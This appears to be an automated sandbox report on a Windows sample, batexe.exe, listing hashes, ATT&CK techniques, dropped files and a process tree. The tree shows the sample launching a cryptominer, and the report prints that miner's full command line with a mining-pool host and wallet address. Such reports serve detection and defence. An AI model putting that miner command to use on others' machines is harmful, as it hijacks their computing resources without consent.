73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 18:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1056	b2e.exe
640	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
640	cpuminer-sse2.exe
640	cpuminer-sse2.exe
640	cpuminer-sse2.exe
640	cpuminer-sse2.exe
640	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4820-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4820 wrote to memory of 1056	4820	batexe.exe	85
PID 4820 wrote to memory of 1056	4820	batexe.exe	85
PID 4820 wrote to memory of 1056	4820	batexe.exe	85
PID 1056 wrote to memory of 3488	1056	b2e.exe	86
PID 1056 wrote to memory of 3488	1056	b2e.exe	86
PID 1056 wrote to memory of 3488	1056	b2e.exe	86
PID 3488 wrote to memory of 640	3488	cmd.exe	89
PID 3488 wrote to memory of 640	3488	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4820
- C:\Users\Admin\AppData\Local\Temp\6F83.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6F83.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6F83.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\71D4.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3488
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6F83.tmp\b2e.exe

Filesize
2.6MB

MD5
ac1df92ed65cf990a71a97b41ba057c1

SHA1
23e041dd8f2917268f51ed5b7b4955b78a75f3e9

SHA256
3d4985b787c2575761bed2af9b23e6337038f53086f154608cb13543db8668ac

SHA512
dd30bfec3b69e0ea9cd6d819e5a6b26e4353ca5eda8936ed64c7bac30aeb3eabb5637e05ea914187a628c8930936c8db60932d29d9cba9e0872355bdd402dae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\6F83.tmp\b2e.exe

Filesize
561KB

MD5
da789dff2767bfc2d80901265bba9b3c

SHA1
5465b9dd799143ac5e8e48737dfc799f8e1f78b3

SHA256
567d100dac3393d79edc43df4632c3e9098f13fb7d62dbd53b9336d419238510

SHA512
5e03f887cd75c9187535e251944b9fa2d45dab06fb5e5495d9c06d4bc2e731c9287114c95ded66de2c33dfc294bd950bec7168b86836aa20c900268f0473e0fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\6F83.tmp\b2e.exe

Filesize
738KB

MD5
99ccf58670757108240895e595fd96e2

SHA1
f0bca48e6b74e1aaf0d0eac683eeefece1494a74

SHA256
490eec9e9873adfa7830a643935db75fcf359259f740180230b1c61f98258cde

SHA512
2b6f8dfaace52173eeba49c8d459671b7b774aed05597e7a899dc9b91dcb7f1a026c2c6918512a4fc45d18294244a95a32e5e4e753aeac5207e0c84013b84980

Download Submit
C:\Users\Admin\AppData\Local\Temp\71D4.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
707KB

MD5
82832c5d4254964e5906f9306f4c9146

SHA1
e0c4d3b9e5633884e885c56399b0b6d887d15d3c

SHA256
3c7ae12a6dbb7a64e063e3426694a9ef52df1616d15e2451eb02aaec5ec5c449

SHA512
4b68fc29c13e1ac3241d73618f1a304a1a47eb21b213bcedae6e37b84ce8505c9296b2445199c9600874dd831f96e94ad1074e4c2f6104a690662f2da6c051aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
769KB

MD5
50e94fc13bfeecfe6aa08a2795b8fbd5

SHA1
0b00f18c72b635dd95e23a7a1cf7024c3a5bfd3e

SHA256
cb769f7bb9659371d54325cf14072555e77cda80f8ea33e49e9ac0d8a2ea575a

SHA512
d8837246520ab9803fa3cb0afafdbeac155c76b546c02c5c61af1b60395d817c8a9268aea1c007145aabdbaa2eccee299dca304c4318b6dc789d284511d6ea4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
734KB

MD5
065c2dbd01f49fed6bce0800d27451a1

SHA1
7532c357b56916be5cd022d5714ab247306dc01f

SHA256
6459856f06f8cc034cdc25b88c63ee00a4af552ad89416476e0c92a506eb245d

SHA512
c815343f2b4802cd60ac932e057269c08e04a8ac7151b4345471e2f876e4eb6da42a4835215252a8fd7fa5f544a0b770a9844362b8cabf1ef748b2b213bddbda

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
790KB

MD5
788010c0fb1280fcbdbf53ba7a048aff

SHA1
41c690c697c1413678977eed5eb64e8640dd9c1c

SHA256
734d9ccef80bd34d9c3f6110c99d2ac28e4853b203350892286af7e05b900b7e

SHA512
9271e835d4c7bc51519f150a2172e4053196c168994c23762ff57a2467b42d68b5b058c9fe3a9278ef205733a3f736ad1c8e0db7d5fb3bee0726414a8dde116a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
851KB

MD5
23a28f556acc7418434196cf5ff93fb0

SHA1
2c422bef2e8dc392baadd43a1534505365db9e26

SHA256
03f3340bea93ffe1d2522d3fa7b96bdbf81515aaa0d3478f23e9ac592cdaf73e

SHA512
0310d38a1bd6713faad89af93b671e3b5d34c9d0efbdb97d077cc9f657d5d2b1ebf674883c1c3828ba185714403f175294dfd3a61043f22376ac8f6be0ac8de7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.0MB

MD5
bbc896cd057c28ab3caaa548c852f57f

SHA1
81485a281a623e65408f9eabcef9aa1c1f6c6b77

SHA256
3dd4e1c8d8b8a22adef1ad6d42f94604721dfec44e2bdf9e50aab6613c5480bc

SHA512
b5db7f8b45fbabed6d9e34fd180ca9648f4c1d32b24b4905077a62039e96d290f4548f68abe3d38580849820ed703a6796e2796652509ca17f84e2e9a0e3cfae

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
591KB

MD5
556cde011fa40e599a6afb0ec5c86e84

SHA1
2cc0a500fec4d61844e6067afeebdd925fc3ab0a

SHA256
c8aab40dbaa9e5b219f0723fdbe5b2e040db09f3c71c6523c37b0e55c5910b5f

SHA512
a4149890d5b6814374625034c413065914b319cd59acbcfc91ae50d6543df42364fe80742a904f264b69714e88b916ab325e21424ae1613fbdde51a48cd8e101

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
582KB

MD5
ff7816a15d2353162cd5c7afda60a1b8

SHA1
d01f693a4bf4b442e7a1e909fd7c91852dd39495

SHA256
0622544fe78d438054c41c88b0afe1824fa52c9aa017f2800af275046931f968

SHA512
768a5f45972a4b8ad0f880ae706ecc8f25fc60a5644607ab825e577b8e8ce8f1bdfed0f1f60b1ff6646683332bda1adfbbcdce852767d0fd12b742a43cd636b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
485KB

MD5
529b534bb7e50c02cce3405f9c279734

SHA1
bd9eb60c0191205c2d84863dbc56046e41d3d332

SHA256
10a56f75b54bb465862c48a1b8f3b9c09493dd58f139ee1691537859a5f9b02c

SHA512
71a65c421286a8cf4c2b0f353ac78bb522cbd1792dd6237ebc56be8f7e4f4839da2022e9fcb6b28041d6b5ddbd4db9f667113d13ed8af5fbfac165356ee7600e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
521KB

MD5
ccbb21584cff559acbd6b215d54ff16c

SHA1
ceaa76f8fa7054be5e53031b3e553a66cf837d36

SHA256
8f0fe9d579bb1595733f06f2c722cb3e28f8c7dda57053514a91078b2649fcbc

SHA512
c09bed56d8cdbe31875f6e3c963a0534a3d7433f49e0bb9d5d866747e9375978c127ff72f6ea4bcdc62445ced1d54b0e39de2573eccffc4d0066039aa1f9a29f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/640-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/640-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/640-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/640-46-0x00000000747F0000-0x0000000074888000-memory.dmp

Filesize
608KB

Download
memory/640-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/640-47-0x0000000001130000-0x00000000029E5000-memory.dmp

Filesize
24.7MB

Download
memory/640-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/640-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/640-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/640-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/640-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/640-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/640-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/640-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/640-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/640-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1056-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1056-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4820-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download